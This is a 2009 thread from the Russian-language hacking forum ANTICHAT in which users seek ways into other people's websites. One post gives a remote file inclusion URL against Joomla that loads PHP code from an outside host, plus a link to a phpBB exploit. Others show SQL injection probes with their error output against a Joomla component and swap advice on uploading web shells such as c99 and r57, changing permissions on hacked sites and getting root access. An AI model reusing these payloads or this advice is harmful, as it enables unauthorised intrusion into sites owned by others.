ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
18.05.2009, 20:49
|
|
Новичок
Регистрация: 23.07.2008
Сообщений: 25
Провел на форуме:
137357
Репутация:
75
|
|
Всеобщее здрасьте! Подскажите пожалуйста, есть форум на phpbb 2.0.5 версии, старыыый вхлам, админы уже наверное с 2005 года там нет, один модератор бедный трудится как может, кароче форум уже загибается, много чего уже не работает попросту, скажите, вот возможно как-нибудь узнать пасс админа. Ну точнее, способов много, но раз форум старый, какой будет самый простой и недолгий способ?
|
|
|
04.06.2009, 13:21
|
|
Новичок
Регистрация: 27.10.2008
Сообщений: 3
Провел на форуме:
20280
Репутация:
0
|
|
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
Последний раз редактировалось Noker; 04.06.2009 в 13:22..
Причина: Орфография
|
|
|
|
07.06.2009, 03:48
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799
Репутация:
62
|
|
Сообщение от Noker
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
exploit:
http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt
Сообщение от Alfer
Подскажите пожалуйста, есть форум на phpbb 2.0.5 версии
Exploit: http://milw0rm.com/id.php?id=44
|
|
|
|
07.06.2009, 06:53
|
|
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429
Репутация:
66
|
|
Сообщение от Noker
Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
Уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии, имхо. ищи баги в компонентах.
|
|
|
|
09.06.2009, 07:00
|
|
Познающий
Регистрация: 16.02.2009
Сообщений: 45
Провел на форуме:
233429
Репутация:
66
|
|
Сижу ковыряю джумлу. Вродь как что то есть в модуле com_exitpoll.
при запросе
Код:
index.php?option=com_exitpoll&task=results&id=1/**/order/**/by/**/1/*
ошибок нет, слепой тоже вроди нету.
при запросе
Код:
index.php?option=com_exitpoll&task=results&id=-1/**/order/**/by/**/1/*
Выдаёт ошибку следующего вида
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n , 1 , 0) AS shw_result\n FROM pros_exitpoll WHERE id= далее поидее должен ити -1, но там кнопочка стоит и видать -1 просто невидно
если это поможет вот этот эрор из исходника страницы
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n , 1 , 0) AS shw_result\n FROM pros_exitpoll WHERE id=<input class="button" type="button" value="Продолжить" onclick="window.history.go(-1);" />
Собсно подскажите чё с этим можно сделать ибо я в потерях. |
|
|
|
14.06.2009, 15:14
|
|
Новичок
Регистрация: 06.07.2008
Сообщений: 24
Провел на форуме:
150387
Репутация:
0
|
|
Доброе время суток всем . Народ как залить шел через админку в dle 7.5 ?
|
|
|
|
14.06.2009, 21:38
|
|
Постоянный
Регистрация: 05.07.2008
Сообщений: 555
Провел на форуме:
3134311
Репутация:
1467
|
|
Сообщение от AGRESOR
Доброе время суток всем . Народ как залить шел через админку в dle 7.5 ?
Если у хостига стоит антивир, то это бесполезно... так как шел в любой форме воспринимать как троян...
А вообще попробуй его подгрузить как картинку если есть такая возможность..
вот здесь искал??
http://damagelab.org/lofiversion/index.php?t=16780
|
|
|
|
15.06.2009, 19:43
|
|
Новичок
Регистрация: 06.06.2009
Сообщений: 2
Провел на форуме:
815
Репутация:
0
|
|
Подскажите, пожалуйста, как можно поменять chmod на сайтах, взломанных с помощью shellа? Мало, кто сейчас ставит права 777, тем более на главный файл index.php. Шелл (c99 или r57) заливаю с помощью уязвимостей, но практически ничего не могу сделать из-за прав, а права не хотят меняться. Может есть какой способ их поменять, может с помощью другой утилиты или шелла?
|
|
|
|
15.06.2009, 19:56
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
MaXoH999 если с шеллом не хотять менятся права то иши какойнить сплоит рутовый!
|
|
|
|
16.06.2009, 01:57
|
|
Новичок
Регистрация: 06.06.2009
Сообщений: 2
Провел на форуме:
815
Репутация:
0
|
|
Сообщение от Rubaka
MaXoH999 если с шеллом не хотять менятся права то иши какойнить сплоит рутовый!
А ещё кроме этого есть какой-нибудь способ поменять права или узнать фтп логин и пароль?
Хорошо и ещё...если я знаю логин и пароль к phpmyadmin, то с помощью этого как-нибудь рут-доступ можно поставить "гостю"?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид